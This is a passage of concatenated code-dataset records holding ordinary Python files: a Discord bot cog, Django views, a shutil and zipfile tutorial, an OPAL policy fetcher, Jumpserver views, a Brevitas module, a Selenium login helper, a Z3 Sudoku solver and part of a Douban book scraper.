@logging_to_channel_stdout\n @purge_command_in_channel\n async def stats(self, ctx):\n pythonVersion = platform.python_version()\n dpyVersion = discord.__version__\n serverCount = str(len(self.client.guilds))\n memberCount = str(len(list(self.client.get_all_members())))\n embed = discord.Embed(title=f'{self.client.user.name} Stats', description='\\uFEFF', colour=ctx.author.colour)\n embed.add_field(name='Bot Version:', value=self.client.Version)\n embed.add_field(name='Python Version:', value=pythonVersion)\n embed.add_field(name='Discord.Py Version', value=dpyVersion)\n embed.add_field(name='Total Guilds:', value=serverCount)\n embed.add_field(name='Total Users:', value=memberCount)\n embed.add_field(name='Bot Developer:', value=\"<@322822954796974080>\")\n embed.add_field(name=\"Intents\", value=self.client.intents)\n embed.set_footer(text=f\"11tuvork28 | {self.client.user.name}\")\n embed.set_author(name=self.client.user, 
icon_url=self.client.user.avatar_url)\n await ctx.send(embed=embed)\n\n @commands.command(pass_context=True, name='ping', brief='Gets and sends bot latency', usage=\"ping\")\n @user()\n @check_args_datatyp\n @logging_to_channel_stdout\n @purge_command_in_channel\n async def ping(self, ctx):\n await ctx.send(f\"Bot ping: **{round(self.client.latency * 1000)}ms**\")\n\n\ndef setup(client):\n client.add_cog(UserCmds(client))\n","sub_path":"base_folder/bot/modules/commands/infocommands.py","file_name":"infocommands.py","file_ext":"py","file_size_in_byte":6588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"116386965","text":"from gujianonline.views_base import *\n\n\n# 材料类型:列表\n@csrf_protect\n@log_in\n@xframe_options_exempt\ndef gjol_goods_type_list(request):\n # 菜单栏点击触发\n if (\"iframe_id\" in request.GET):\n return render(request, \"goods_type/list.html\")\n\n else: # table.render中的url跳转\n page = request.GET.get(\"page\")\n limit = request.GET.get(\"limit\")\n name = request.GET.get(\"name\", \"\").strip()\n\n raw_data = list(GJOL_Goods_Type.objects.filter(Q(is_del=0) & Q(name__contains=name)).values())\n page_inator = Paginator(raw_data, limit) # 分页\n contacts = page_inator.page(page) # 请求第几页数据\n data_list = [] # 最终返回的结果集合\n for contact in contacts:\n data_list.append(contact)\n\n res = {}\n res[\"code\"] = 0\n res[\"msg\"] = \"success\"\n res[\"data\"] = data_list\n res[\"count\"] = len(raw_data)\n return JsonResponse(res)\n\n\n# 材料类型:新增\n@csrf_protect\n@log_in\n@xframe_options_exempt\ndef gjol_goods_type_add(request):\n if request.method == 'GET':\n return render(request, \"goods_type/edit.html\", {\"path\": \"gjol_goods_type_add\"})\n\n else:\n name = request.POST.get('name')\n sort = request.POST.get('sort')\n remark = request.POST.get('remark')\n create_by = request.session.get('user_id')\n\n goods_type = GJOL_Goods_Type(\n name=name,\n sort=sort,\n remark=remark,\n create_by=create_by)\n goods_type.save()\n res = {\"msg\": \"新增成功!\"}\n return JsonResponse(res)\n\n\n# 材料类型:编辑\n@csrf_protect\n@log_in\n@xframe_options_exempt\ndef gjol_goods_type_edit(request):\n if request.method == 'GET':\n id = request.GET.get('id')\n raw_data = list(GJOL_Goods_Type.objects.filter(id=id).values())\n return render(request, \"goods_type/edit.html\", {\"goods_type_list\": raw_data, \"path\": \"gjol_goods_type_edit\"})\n\n else:\n id = request.POST.get('id')\n name = request.POST.get('name')\n sort = request.POST.get('sort')\n remark = request.POST.get('remark')\n GJOL_Goods_Type.objects.filter(id=id).update(\n name=name,\n sort=sort,\n remark=remark,)\n res = {\"msg\": \"编辑成功!\"}\n return JsonResponse(res)","sub_path":"gujianonline/views/v_goods_type.py","file_name":"v_goods_type.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"62983741","text":"import shutil # 高级的文件、文件夹、压缩包处理模块\n\nfsrc = open(\"doc/src.txt\", mode=\"r\", encoding=\"utf-8\")\nfdst = open(\"doc/des.txt\", mode=\"w\", encoding=\"utf-8\")\nshutil.copyfileobj(fsrc, fdst, length=16*1024) # 拷贝文件对象,每次读16*1024\nshutil.copyfile(\"doc/src2.txt\", \"doc/des2.txt\") # 不用打开文件,直接copy\n\n\n\n#shutil.copymode(\"doc/src2.txt\", \"doc/des2.txt\") # 仅拷贝权限,不拷贝内容\n#shutil.copystat(\"doc/src2.txt\", \"doc/des2.txt\") # 拷贝权限、状态(创建时间等)\nshutil.copy(\"doc/src3.txt\", \"doc/des3.txt\") # 拷贝文件和权限\n#shutil.copy2(\"doc/src3.txt\", \"doc/des3.txt\") # 拷贝文件和状态\n#shutil.copytree(\"doc/src3.txt\", \"doc/des3.txt\") # 
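The v_goods_type.py views above all share one shape: render the page shell for the iframe request, otherwise filter, paginate, and return the layui-style JSON envelope {code, msg, data, count}. A hedged sketch of that shared step, factored out; it only runs inside a configured Django project, and the queryset argument is a placeholder for any model manager call.

from django.core.paginator import Paginator
from django.http import JsonResponse

def table_json(request, queryset):
    page = request.GET.get("page", 1)
    limit = request.GET.get("limit", 10)
    rows = list(queryset.values())
    # Paginator casts per_page/page to int itself, so the GET strings are fine
    contacts = Paginator(rows, limit).page(page)
    return JsonResponse({
        "code": 0,
        "msg": "success",
        "data": list(contacts),
        "count": len(rows),
    })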
递归拷贝,和shutil.ignore_patterns()配合可以过滤一些文件,例如:\n#copytree(source, destination, ignore=shutil.ignore_patterns('*.pyc', 'tmp*'))\n#shutil.rmtree(path[, ignore_errors[, onerror]]) # 递归的去删除文件\n#shutil.move(src, dst) # 递归的去移动文件\n\n'''\nshutil.make_archive(base_name, format,...)\n\n创建压缩包并返回文件路径,例如:zip、tar\n\nbase_name: 压缩包的文件名,也可以是压缩包的路径。只是文件名时,则保存至当前目录,否则保存至指定路径,\n如:www =>保存至当前路径\n如:/Users/wupeiqi/www =>保存至/Users/wupeiqi/\nformat:\t压缩包种类,“zip”, “tar”, “bztar”,“gztar”\nroot_dir:\t要压缩的文件夹路径(默认当前目录)\nowner:\t用户,默认当前用户\ngroup:\t组,默认当前组\nlogger:\t用于记录日志,通常是logging.Logger对象\n'''\nret = shutil.make_archive(\"doc/src\", 'gztar', root_dir='E:/workspace_python/first/foundation/mymodule/doc')\n\n# shutil 对压缩包的处理是调用 ZipFile 和 TarFile 两个模块来进行的,详细:\nimport zipfile\n\n# 压缩\nz = zipfile.ZipFile('doc/laxi.zip', 'w')\nz.write('doc/src.txt')\nz.write('doc/src2.txt')\nz.close()\n\n# 解压\nz = zipfile.ZipFile('doc/laxi.zip', 'r')\nz.extractall()\nz.close()\n\nimport tarfile # 仅打包,不���缩\n\n# 打包\ntar = tarfile.open(\"doc/test.tar\", \"w\")\ntar.add(\"doc/laxi.zip\")\ntar.add(\"doc/laxi2.zip\")\ntar.close()\n\n#解包\ntar = tarfile.open(\"doc/test.tar\", \"r\")\ntar.extractall(\"doc\") # 设置解包地址\ntar.close()\n","sub_path":"foundation/mymodule/4shutil.py","file_name":"4shutil.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"544155365","text":"import aiohttp\n\nfrom typing import List, Optional\nfrom pydantic import ValidationError\nfrom fastapi import status, HTTPException\nfrom tenacity import retry, wait, stop\n\nfrom opal_common.utils import get_authorization_header\nfrom opal_common.schemas.policy import PolicyBundle\nfrom opal_client.utils import tuple_to_dict\nfrom opal_client.logger import logger\nfrom opal_client.config import opal_client_config\n\n\ndef force_valid_bundle(bundle) -> PolicyBundle:\n try:\n return PolicyBundle(**bundle)\n except ValidationError as e:\n logger.warning(\"server returned invalid bundle: {err}\", bundle=bundle, err=repr(e))\n raise\n\nasync def throw_if_bad_status_code(response: aiohttp.ClientResponse, expected: List[int]) -> aiohttp.ClientResponse:\n if response.status in expected:\n return response\n\n # else, bad status code\n details = await response.json()\n logger.warning(\"Unexpected response code {status}: {details}\", status=response.status, details=details)\n raise ValueError(f\"unexpected response code while fetching bundle: {response.status}\")\n\nclass PolicyFetcher:\n \"\"\"\n fetches policy from backend\n \"\"\"\n DEFAULT_RETRY_CONFIG = {\n 'wait': wait.wait_random_exponential(max=10),\n 'stop': stop.stop_after_attempt(5),\n 'reraise': True,\n }\n\n def __init__(self, backend_url=None, token=None, retry_config=None):\n \"\"\"\n Args:\n backend_url (str): Defaults to opal_client_config.SERVER_URL.\n token ([type], optional): [description]. 
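The zipfile/tarfile demo in 4shutil.py above pairs every open with an explicit close(); both types also work as context managers, which closes the handles even on error. The same steps in that idiom, assuming the same doc/ files exist:

import tarfile
import zipfile

with zipfile.ZipFile("doc/laxi.zip", "w") as z:
    z.write("doc/src.txt")

with zipfile.ZipFile("doc/laxi.zip", "r") as z:
    z.extractall("doc")

with tarfile.open("doc/test.tar", "w") as tar:
    tar.add("doc/laxi.zip")

with tarfile.open("doc/test.tar", "r") as tar:
    tar.extractall("doc")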
Defaults to opal_client_config.CLIENT_TOKEN.\n \"\"\"\n self._token = token or opal_client_config.CLIENT_TOKEN\n self._backend_url = backend_url or opal_client_config.SERVER_URL\n self._auth_headers = tuple_to_dict(get_authorization_header(self._token))\n self._retry_config = retry_config if retry_config is not None else self.DEFAULT_RETRY_CONFIG\n self._policy_endpoint_url = f\"{self._backend_url}/policy\"\n\n @property\n def policy_endpoint_url(self):\n return self._policy_endpoint_url\n\n async def fetch_policy_bundle(\n self,\n directories: List[str] = ['.'],\n base_hash: Optional[str] = None\n ) -> Optional[PolicyBundle]:\n attempter = retry(**self._retry_config)(self._fetch_policy_bundle)\n try:\n return await attempter(directories=directories, base_hash=base_hash)\n except Exception as err:\n logger.warning(\"Failed all attempts to fetch bundle, got error: {err}\", err=repr(err))\n raise\n\n async def _fetch_policy_bundle(\n self,\n directories: List[str] = ['.'],\n base_hash: Optional[str] = None\n ) -> Optional[PolicyBundle]:\n \"\"\"\n Fetches the bundle. May throw, in which case we retry again.\n \"\"\"\n params = {\"path\": directories}\n if base_hash is not None:\n params[\"base_hash\"] = base_hash\n async with aiohttp.ClientSession() as session:\n try:\n async with session.get(\n self._policy_endpoint_url,\n headers={'content-type': 'text/plain', **self._auth_headers},\n params=params\n ) as response:\n if response.status == status.HTTP_404_NOT_FOUND:\n logger.warning(\"requested paths not found: {paths}\", paths=directories)\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"requested path {self._policy_endpoint_url} was not found in the policy repo!\"\n )\n\n\n # may throw ValueError\n await throw_if_bad_status_code(response, expected=[status.HTTP_200_OK])\n\n # may throw Validation Error\n bundle = await response.json()\n return force_valid_bundle(bundle)\n except aiohttp.ClientError as e:\n logger.warning(\"server connection error: {err}\", err=repr(e))\n raise\n\n","sub_path":"opal_client/policy/fetcher.py","file_name":"fetcher.py","file_ext":"py","file_size_in_byte":4116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"70072703","text":"# ~*~ coding: utf-8 ~*~\nfrom __future__ import unicode_literals\nimport time\nimport json\nfrom datetime import datetime\n\nfrom django.conf import settings\nfrom django.views.generic import ListView, DetailView, View\nfrom django.utils import timezone\nfrom django.shortcuts import redirect, reverse\n\nfrom .models import Task\nfrom ops.tasks import rerun_task\n\n\nclass TaskListView(ListView):\n paginate_by = settings.CONFIG.DISPLAY_PER_PAGE\n model = Task\n ordering = ('-date_start',)\n context_object_name = 'task_list'\n template_name = 'ops/task_list.html'\n date_format = '%m/%d/%Y'\n keyword = date_from_s = date_to_s = ''\n\n def get_queryset(self):\n date_now = timezone.localtime(timezone.now())\n date_to_default = date_now.strftime(self.date_format)\n date_from_default = (date_now - timezone.timedelta(7)) \\\n .strftime(self.date_format)\n\n self.queryset = super(TaskListView, self).get_queryset()\n self.keyword = self.request.GET.get('keyword', '')\n self.date_from_s = self.request.GET.get('date_from', date_from_default)\n self.date_to_s = self.request.GET.get('date_to', date_to_default)\n\n if self.date_from_s:\n date_from = datetime.strptime(self.date_from_s, self.date_format)\n date_from = 
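PolicyFetcher above applies tenacity at call time, retry(**self._retry_config)(self._fetch_policy_bundle), rather than as a decorator, so each instance can carry its own retry policy. A standalone sketch of that pattern with the same config keys; flaky() is an invented stand-in for the network call.

import random
from tenacity import retry, stop, wait

RETRY_CONFIG = {
    "wait": wait.wait_random_exponential(max=10),
    "stop": stop.stop_after_attempt(5),
    "reraise": True,  # after 5 failed attempts the original error propagates
}

random.seed(0)  # makes this demo deterministic

def flaky():
    if random.random() < 0.7:
        raise ConnectionError("transient failure")
    return "ok"

attempter = retry(**RETRY_CONFIG)(flaky)  # wrap at call time, not at def time
print(attempter())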
date_from.replace(tzinfo=timezone.get_current_timezone())\n self.queryset = self.queryset.filter(date_start__gt=date_from)\n\n if self.date_to_s:\n date_to = timezone.datetime.strptime(\n self.date_to_s + ' 23:59:59', '%m/%d/%Y %H:%M:%S')\n date_to = date_to.replace(tzinfo=timezone.get_current_timezone())\n self.queryset = self.queryset.filter(date_finished__lt=date_to)\n\n if self.keyword:\n self.queryset = self.queryset.filter(\n name__icontains=self.keyword,\n )\n return self.queryset\n\n def get_context_data(self, **kwargs):\n context = {\n 'app': 'Ops',\n 'action': 'Task record list',\n 'date_from': self.date_from_s,\n 'date_to': self.date_to_s,\n 'keyword': self.keyword,\n }\n kwargs.update(context)\n return super(TaskListView, self).get_context_data(**kwargs)\n\n\nclass TaskDetailView(DetailView):\n model = Task\n template_name = 'ops/task_detail.html'\n\n def get_context_data(self, **kwargs):\n context = {\n 'app': 'Ops',\n 'action': 'Task record detail',\n 'results': json.loads(self.object.summary or '{}'),\n }\n kwargs.update(context)\n return super(TaskDetailView, self).get_context_data(**kwargs)\n\n\nclass TaskRunView(View):\n pk_url_kwarg = 'pk'\n\n def get(self, request, *args, **kwargs):\n pk = kwargs.get(self.pk_url_kwarg)\n rerun_task.delay(pk)\n time.sleep(0.5)\n return redirect(reverse('ops:task-detail', kwargs={'pk': pk}))\n","sub_path":"jumpserver-dev/apps/ops/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"155723641","text":"# Copyright (C) 2023, Advanced Micro Devices, Inc. All rights reserved.\n# SPDX-License-Identifier: BSD-3-Clause\n\n\nimport torch\nfrom torch import Tensor\nfrom torch.nn import Module\n\nimport brevitas\nfrom brevitas.function.ops_ste import tensor_clamp_ste\nfrom brevitas.core.utils import StatelessBuffer\n\n\nclass BitWidthConst(brevitas.jit.ScriptModule):\n \"\"\" \n ScriptModule that returns a constant bit-width wrapped in a float torch.tensor.\n\n Args:\n bit_width (int): bit-width value.\n\n Examples:\n >>> bit_width = BitWidthConst(8)\n >>> bit_width()\n tensor(8.)\n\n Note:\n The bit-width is not part of the Module's state, meaning that it won't be saved as part of\n a checkpoint.\n\n Note:\n Maps to bit_width_impl_type == BitWidthImplType.CONST == 'CONST' == 'const' in higher-level APIs.\n \"\"\"\n def __init__(self, bit_width: int) -> None:\n super(BitWidthConst, self).__init__()\n assert isinstance(bit_width, int)\n self.bit_width = StatelessBuffer(torch.tensor(float(bit_width)))\n\n @brevitas.jit.script_method\n def forward(self) -> Tensor:\n return self.bit_width()\n\n\nclass MsbClampBitWidth(brevitas.jit.ScriptModule):\n\n def __init__(\n self,\n bit_width_to_remove_impl: Module,\n min_overall_bit_width: int,\n max_overall_bit_width: int) -> None:\n super(MsbClampBitWidth, self).__init__()\n\n self.min_overall_bit_width = BitWidthConst(min_overall_bit_width)\n self.max_overall_bit_width = BitWidthConst(max_overall_bit_width)\n self.bit_width_to_remove_impl = bit_width_to_remove_impl\n\n @brevitas.jit.script_method\n def forward(self, input_bit_width: Tensor) -> Tensor:\n bit_width_to_remove = self.bit_width_to_remove_impl()\n output_bit_width = torch.abs(input_bit_width - bit_width_to_remove)\n output_bit_width = tensor_clamp_ste(\n output_bit_width,\n self.min_overall_bit_width(),\n self.max_overall_bit_width())\n return 
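The TaskListView filtering above parses MM/DD/YYYY bounds and widens the end of the window to 23:59:59 so the last day is fully included. The same date-window logic in isolation, pure datetime and no Django, so it can be checked by hand:

from datetime import datetime

date_format = "%m/%d/%Y"
date_from = datetime.strptime("11/01/2020", date_format)
# append the last second of the day, exactly as the view does
date_to = datetime.strptime("11/07/2020 23:59:59", "%m/%d/%Y %H:%M:%S")

def in_window(ts):
    return date_from < ts < date_to

print(in_window(datetime(2020, 11, 3, 12, 0)))  # True
print(in_window(datetime(2020, 11, 8, 0, 0)))   # False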
output_bit_width","sub_path":"src/brevitas/core/bit_width/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"522743479","text":"from selenium import webdriver\nfrom time import sleep\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.chrome.options import Options\nclass Login:\n def login(self):\n self.options = Options()\n self.options.add_argument('--no-sandbox')\n self.options.add_argument('--disable-dev-shm-usage')\n self.options.add_argument('--headless')\n # 实例化浏览器\n self.d = webdriver.Chrome(chrome_options=self.options)\n # 打开登录界面\n self.d.get(\"http://localhost\")\n # WebDriverWait(self.d,60.1).until(lambda ele:self.d.find_element_by_xpath('//*[@id=\"app\"]/div/div[1]/form/div[1]/div/div/input'))\n # self.d.find_element_by_xpath('//*[@id=\"app\"]/div/div[1]/form/div[1]/div/div/input').clear()\n # sleep(1)\n # self.d.find_element_by_xpath('//*[@id=\"app\"]/div/div[1]/form/div[1]/div/div/input').send_keys(\"admin\")\n # sleep(1)\n # self.d.find_element_by_xpath('//*[@id=\"app\"]/div/div[1]/form/div[2]/div/div/input').clear()\n # sleep(1)\n # self.d.find_element_by_xpath('//*[@id=\"app\"]/div/div[1]/form/div[2]/div/div/input').send_keys('admin')\n # sleep(1)\n #点击提交登录系统\n self.d.find_element_by_xpath('//*[@id=\"app\"]/div/div[1]/div[2]/form/div[3]/div/button').click()\n sleep(2)","sub_path":"common/Login.py","file_name":"Login.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"129709509","text":"\n\n# Will Frazier\n# Adapted from Prof. Kfoury \n\nfrom z3 import * \n\n# The 9x9 grid, together with the 9 possible digits in each cell,\n# is represented by a 9x9x9 matrix S of Boolean values :\nS = [ [ [ Bool(\"s_%s_%s_%s\" % (i+1, j+1, k+1)) for k in range(9) ]\n for j in range(9) ]\n for i in range(9) ]\n\n# CONSTRAINT: Each cell contains a digit in {1, ..., 9} :\ncell_constraint = [ Or([ S[i][j][k] for k in range(9) ])\n for i in range(9) for j in range(9) ]\n\n# CONSTRAINT: Each row contains the same digit at most once :\nrow_constraint = [ And( Not( And( S[i][j][k], S[p][j][k] )))\n for j in range(9) for k in range(9)\n for i in range(8) for p in range(i+1,9) ]\n\n# CONSTRAINT: Each column contains the same digit at most once :\ncolumn_constraint = [ And( Not( And( S[i][j][k], S[i][p][k] )))\n for i in range(9) for k in range(9)\n for j in range(8) for p in range(j+1,9) ]\n\n# CONSTRAINT: Each 3x3 sub-grid contains a digit at most once :\nsq_constraintA = [ And( Not( And( S[3*p+i][3*q+j][k], S[3*p+i][3*q+r][k])))\n for k in range(9) for p in range(3) for q in range(3)\n for i in range(3) for j in range(3) for r in range(j+1,3) ]\n\nsq_constraintB = [ And( Not( And( S[3*p+i][3*q+j][k], S[3*p+r][3*q+n][k])))\n for k in range(9) for p in range(3) for q in range(3)\n for i in range(3) for j in range(3) for r in range(i+1,3)\n for n in range(3) ]\n\n# Combine the 5 preceding constraints into a single CONSTRAINT :\nsudoku_constraint = cell_constraint + row_constraint + column_constraint \\\n + sq_constraintA + sq_constraintB\n\n# An initial Sudoku instance is here encoded as a two-dimensional matrix.\n# For other initial Sudoku instances, you need to modify the matrix 'instance'.\n\n# An initial Sudoku instance, where '0' denotes an empty cell :\n\"\"\"\n#instance = ((0,0,0,0,9,4,0,3,0),\n# (0,0,0,5,1,0,0,0,7),\n# (0,8,9,0,0,0,0,4,0),\n# 
(0,0,0,0,0,0,2,0,8),\n# (0,6,0,2,0,1,0,5,0),\n# (1,0,2,0,0,0,0,0,0),\n# (0,7,0,0,0,0,5,2,0),\n# (9,0,0,0,6,5,0,0,0),\n# (0,4,0,9,7,0,0,0,0))\n\n\n#instance = ((1,0,0,0,9,4,0,3,0),\n# (0,0,0,5,1,0,0,0,7),\n# (0,8,9,0,0,0,0,4,0),\n# (0,0,0,0,0,0,2,0,8),\n# (0,6,0,2,0,1,0,5,0),\n# (1,0,2,0,0,0,0,0,0),\n# (0,7,0,0,0,0,5,2,0),\n# (9,0,0,0,6,5,0,0,0),\n# (0,4,0,9,7,0,0,0,0))\n\n\n\n\n# Another initial Sudoku instance :\ninstance = ((0,0,0,7,0,0,0,9,1),\n (0,3,1,0,0,8,0,0,0),\n (0,0,0,0,1,6,3,0,0),\n (0,9,0,0,0,0,0,8,4),\n (0,0,0,8,0,5,0,0,0),\n (6,4,0,0,0,0,0,7,0),\n (0,0,6,5,8,0,0,0,0),\n (0,0,0,1,0,0,7,3,0),\n (2,8,0,0,0,9,0,0,0))\n\n# Another initial Sudoku instance :\ninstance = ((2,1,3,5,4,9,6,8,7),\n (0,0,0,8,0,0,0,0,0),\n (7,9,8,1,5,3,2,6,4),\n (9,5,4,7,8,6,0,0,0),\n (0,0,0,0,6,0,0,0,0), \n (0,0,0,0,0,0,4,0,0),\n (0,0,0,3,0,1,8,5,9),\n (5,4,1,9,3,8,7,2,6),\n (8,7,6,4,9,2,5,1,3))\n\"\"\"\n\n\n\n\n\n# CONSTRAINT: Insert the clues according to their positions in the\n# initial Sudoku instance :\n\ndef run(instance):\n initial_constraint = [ If(instance[i][j] == k+1, S[i][j][k], True)\n for i in range(9) for j in range(9) for k in range(9)]\n \n # list to store all possible solutions\n results=[]\n s = Solver()\n # add our constraints\n s.add( sudoku_constraint + initial_constraint )\n while s.check() == sat:\n m = s.model()\n r = [ [ k+1 for j in range(9) for k in range(9)\n if is_true (m.evaluate(S[i][j][k])) ]\n for i in range(9) ]\n if r not in results:\n results.append (r)\n block = []\n for d in m :\n t = d()\n block.append ( t != m[d] )\n s.add (Or (block))\n# for n in range (len (results)) :\n# print_matrix(results[n])\n# if results == []:\n# print(results)\n return results","sub_path":"frazier_william.hw02/sudoku_in_PL.py","file_name":"sudoku_in_PL.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"580912850","text":"# -*- coding: utf-8 -*-\nimport requests\nimport lxml.html\nimport random\nimport time\nimport pandas as pd\nimport signal\nimport sys\nimport csv\nimport os\nfrom selenium import webdriver\n\n\nhead = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.163 Safari/535.1',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',\n 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0)',\n 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; ARM; Trident/6.0)'\n ]\n\nproxies = {\n 'http': 'http://121.204.150.97:8118',\n 'http': 'http://116.209.54.142:9999',\n 'http': 'http://180.118.247.29:9000',\n 'http': 'http://125.123.140.211:8118',\n 'http': 'http://218.91.112.182:9999',\n 'http': 'http://117.90.4.255:9000'\n}\ndef exit(signum, frame):\n print('You choose to stop me.')\n sys.exit(0)\n\n\ndef get_books(urls):\n with open(\"./results/books.csv\",\"a+\",encoding=\"utf8\",newline=\"\")as csvfile:\n writer=csv.writer(csvfile)\n if not os.path.exists(\"./results/books.csv\"):\n writer.writerow([\"id\", \"title\", \"book_url\", \"pic_url\", \"author\", \"press\", \"original\", \"translator\",\n \"publish_date\", \"pages\",\"price\",\"binding\", \"ISBN\", \"score\", \"rating_count\", \"summary\",\n \"autor_intro\", \"author_id\", \"tags\", \"comment1\",\"comment2\", \"comment3\",\"comment4\",\n \"comment5\", \"rec_id1\", \"rec_id2\", \"rec_id3\", \"rec_id4\", \"rec_id5\", \"rec_id6\", \"rec_id7\",\n \"rec_id8\",\"rec_id9\", \"rec_id10\"])\n\n total_num=len(urls)\n print(total_num)\n 
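The run() loop in the Sudoku solver above enumerates every model by adding a "blocking clause" that forbids the assignment just found, then asking Z3 again. The same idiom on a toy formula, stripped of the Sudoku bookkeeping:

from z3 import Bool, Or, Solver, sat

a, b = Bool("a"), Bool("b")
s = Solver()
s.add(Or(a, b))

while s.check() == sat:
    m = s.model()
    print([(d, m[d]) for d in m])
    # forbid this exact model so the next check() must find a different one
    s.add(Or([d() != m[d] for d in m]))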
current_num=0\n driver = webdriver.PhantomJS(executable_path=\"./webdriver/phantomjs/bin/phantomjs.exe\")\n\n for url in urls:\n\n current_num+=1\n book_url =url\n\n id=book_url[32:-1]\n\n try:\n driver.get(book_url)\n tar=driver.page_source\n if(len(tar)<1000):\n print(tar)\n sys.exit(0)\n\n except Exception as e:\n print(e)\n print(\"get failed\")\n continue\n tar_html = lxml.html.fromstring(tar)\n # 书名\n try:\n title = tar_html.xpath(\"//span[@property='v:itemreviewed']/text()\")[0]\n except Exception as e:\n print(\"title failed\")\n continue\n # 图片url\n pic_url = tar_html.xpath(\"//a[@class='nbg']/@href\")[0]\n\n # 作者\n print(book_url)\n try:\n author = tar_html.xpath(\"//div[@id='info']/span/a/text()\")[0]\n except Exception as e:\n print(\"author failed\")\n\n continue\n\n\n print()\n #\n # 封面url\n pic_urls=tar_html.xpath(\"//div[@id='mainpic']/a[@class='nbg']/@href\")\n if pic_urls:\n pic_url=pic_urls[0]\n else:\n print(\"pic_url failed\")\n continue\n\n authorids = tar_html.xpath(\"//div[@id='info']/span[1]/a/@href\")\n if authorids:\n author_id=authorids[0]\n else:\n author_id=\"\"\n\n\n #出版社\n presses=tar_html.xpath(\"//text()[preceding-sibling::span[text()='出版社:']][following-sibling::br]\")\n if presses:\n press=presses[0].replace(\"\\n\",\"\").replace(\" \",\"\")\n else:\n press=\"\"\n\n\n\n #原作名\n originals=tar_html.xpath(\"//text()[preceding-sibling::span[text()='原作名:']][following-sibling::br]\")\n if originals:\n original=originals[0].replace(\"\\n\",\"\").replace(\" \",\"\")\n else:\n original=\"\"\n\n\n #译者\n translators = tar_html.xpath(\"//a[parent::span[child::span[text()=' 译者']]]/text()\")\n if translators:\n translator = '/'.join((i.strip() for i in translators))\n else:\n translator = ''\n\n\n #出版年\n publish_dates=tar_html.xpath(\"//text()[preceding-sibling::span[text()='出版年:']][following-sibling::br]\")\n if publish_dates:\n publish_date=publish_dates[0].replace(\"\\n\",\"\").replace(\" \",\"\")\n else:\n publish_date=\"\"\n\n\n\n #页数\n pages = tar_html.xpath(\"//text()[preceding-sibling::span[text()='页数:']][following-sibling::br]\")\n if pages:\n page = pages[0].replace(\"\\n\", \"\").replace(\" \", \"\")\n else:\n page = \"\"\n\n # 定价\n prices = tar_html.xpath(\"//text()[preceding-sibling::span[text()='定价:']][following-sibling::br]\")\n if prices:\n price = prices[0].replace(\"\\n\", \"\").replace(\" \", \"\")\n else:\n price= \"\"\n\n\n #装帧\n bindings = tar_html.xpath(\"//text()[preceding-sibling::span[text()='装帧:']][following-sibling::br]\")\n if bindings:\n binding = bindings[0].replace(\"\\n\", \"\").replace(\" \", \"\")\n else:\n binding = \"\"\n\n\n #ISBN\n ISBNs = tar_html.xpath(\"//text()[preceding-sibling::span[text()='ISBN:']][following-sibling::br]\")\n if ISBNs:\n ISBN = ISBNs[0].replace(\"\\n\", \"\").replace(\" \", \"\")\n else:\n ISBN = \"\"\n\n\n #豆瓣评分\n scores=tar_html.xpath(\"//strong[@property='v:average']/text()\")\n global score\n if scores:\n if scores[0].strip():\n score=scores[0].strip()\n else:\n score=\"\"\n\n\n #评分人数rating_count\n rating_counts=tar_html.xpath(\"//span[@property='v:votes']/text()\")\n if rating_counts:\n if rating_counts[0].strip():\n rating_count=rating_counts[0].strip()\n else:\n rating_count=\"\"\n\n\n #内容简介summary\n summarys=tar_html.xpath(\"//div[@class='intro']\")\n global summary\n if summarys:\n try:\n summary = ''.join(item for item in summarys[0].xpath('p/text()')).replace(',',',').replace(\" \",\"\").replace(\"\\n\",\"\")\n except Exception as e:\n summary=\"\"\n\n #作者简介autro_intro\n if summarys:\n try:\n 
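Almost every field in the book crawler above repeats the same three lines: run an XPath query, take the first hit if any, otherwise fall back to "". A small helper (first_or_default is an invented name) collapses that, shown here on a miniature version of the Douban info block:

import lxml.html

def first_or_default(tree, xpath, default="", clean=True):
    hits = tree.xpath(xpath)
    if not hits:
        return default
    value = hits[0]
    # the crawler strips newlines and spaces from every scalar field
    return value.replace("\n", "").replace(" ", "") if clean else value

tree = lxml.html.fromstring("<div id='info'><span>出版社:</span> Foo </div>")
press = first_or_default(tree, "//div[@id='info']/span/following-sibling::text()")
print(press)  # Foo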
